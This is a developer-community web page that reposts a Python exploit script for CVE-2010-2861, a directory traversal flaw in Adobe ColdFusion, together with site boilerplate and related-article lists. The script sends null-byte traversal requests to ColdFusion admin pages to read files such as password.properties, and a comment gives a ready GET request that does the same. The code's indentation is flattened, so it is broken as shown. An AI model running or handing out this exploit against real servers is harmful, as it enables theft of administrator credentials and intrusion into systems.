# Working GET request courtesy of carnal0wnage:
# http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
#
# LLsecurity added another admin page filename: "/CFIDE/administrator/enter.cfm"
#!/usr/bin/python
# CVE-2010-2861 - Adobe ColdFusion Unspecified Directory Traversal Vulnerability
# detailed information about the exploitation of this vulnerability:
# http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
# leo 13.08.2010
import sys
import socket
import re
# in case some directories are blocked
filenames = ("/CFIDE/wizards/common/_logintowizard.cfm", "/CFIDE/administrator/archives/index.cfm", "/cfide/install.cfm", "/CFIDE/administrator/entman/index.cfm", "/CFIDE/administrator/enter.cfm")
post = """POST %s HTTP/1.1
Host: %s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
locale=%%00%s%%00a"""
def main():
if len(sys.argv) != 4:
print "usage: %s <host> <port> <file_path>" % sys.argv[0]
print "example: %s localhost 80 ../../../../../../../lib/password.properties" % sys.argv[0]
print "if successful, the file will be printed"
return
host = sys.argv[1]
port = sys.argv[2]
path = sys.argv[3]
for f in filenames:
print "------------------------------"
print "trying", f
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, int(port)))
s.send(post % (f, host, len(path) + 14, path))
buf = ""
while 1:
buf_s = s.recv(1024)
if len(buf_s) == 0:
break
buf += buf_s
m = re.search('<title>(.*)</title>', buf, re.S)
if m != None:
title = m.groups(0)[0]
print "title from server in %s:" % f
print "------------------------------"
print m.groups(0)[0]
print "------------------------------"
if __name__ == '__main__':
main()
Adobe ColdFusion Unspecified Directory Traversal Vulnerability
2010-08-24
901
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《
阿里云开发者社区用户服务协议》和
《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写
侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:
# Working GET request courtesy of carnal0wnage:# http://server/CFIDE/administrator/enter.
目录
相关文章
|
SQL
安全
Java
SAP useful website
1360
0
0
|
安全
Java
Ruby
Yes Small Companies Can – and Should – Build Secure Software
"For large software companies or major corporations such as banks or health care firms with lar...
1030
0
0
|
JavaScript
内存技术
Vulnerabilities in SWFUpload in multiple web applications: WordPress, Dotclear, InstantCMS, AionWeb
Hello list!
Earlier I've wrote about Content Spoofing and Cross-Site Scripting
vulnerabilities in SWFUpload (http://securityvulns.
943
0
0
MetaSploit Framework 'pcap_log' Plugin Local Privilege Escalation Vulnerability
http://www.securityfocus.com/bid/54472/exploit
783
0
0
|
SQL
安全
传感器
Checking For Vulnerabilities in Path Fragments
http://www.acunetix.com/blog/web-security-zone/articles/web-vulnerabilities-path-fragments/?ut...
976
0
0
|
应用服务中间件
nginx
eWebEditor suffers from a directory traversal vulnerability
################################################################## Securitylab.
1031
0
0
|
虚拟化
Perl
网络安全
GuestStealer allows for the stealing of VMware guests from vulnerable hosts based on the Directory Traversal Vulnerability
GuestStealer allows for the stealing of VMware guests from vulnerable hosts based on the Directo...
838
0
0
热门文章
最新文章
1
多中心容灾实践:如何实现真正的异地多活?
2
持续定义SaaS模式云数据仓库+数据银行
3
charles抓包显示乱码解决方法
4
千亿美元规模,云计算的下半场将走向何方?
5
DSP_代码笔记(基于TMS320X281x)
6
TypeScript 泛型
7
又爱又恨的BOOTSTRAP
8
AngularJS中使用service,并同步数据
9
平板电脑进化论:从玩具到工具
10
屌丝程序员在夏始春末拍的罗曼史之夏婚系列---结婚了
1
【C语言程序设计——循环程序设计】求解最大公约数(头歌实践教学平台习题)【合集】
37
2
【C++数据结构——栈与队列】顺序栈的基本运算(头歌实践教学平台习题)【合集】
110
3
【C语言程序设计——循环程序设计】统计海军鸣放礼炮声数量(头歌实践教学平台习题)【合集】
31
4
【C语言程序设计——循环程序设计】利用循环求数值 x 的平方根(头歌实践教学平台习题)【合集】
30
5
【C++面向对象——类与对象】Computer类(头歌实践教学平台习题)【合集】
32
6
【C++面向对象——类与对象】Computer类(头歌实践教学平台习题)【合集】
29
7
【C++数据结构——图】最短路径(头歌教学实验平台习题) 【合集】
32
8
【C++数据结构——树】二叉树的性质(头歌实践教学平台习题)【合集】
25
9
【C++数据结构——树】哈夫曼树(头歌实践教学平台习题) 【合集】
30
10
【C++面向对象——类与对象】CPU类(头歌实践教学平台习题)【合集】
28